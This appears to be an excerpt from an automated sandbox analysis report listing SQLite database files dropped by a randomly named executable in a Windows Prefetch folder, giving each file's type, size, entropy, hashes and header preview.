                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
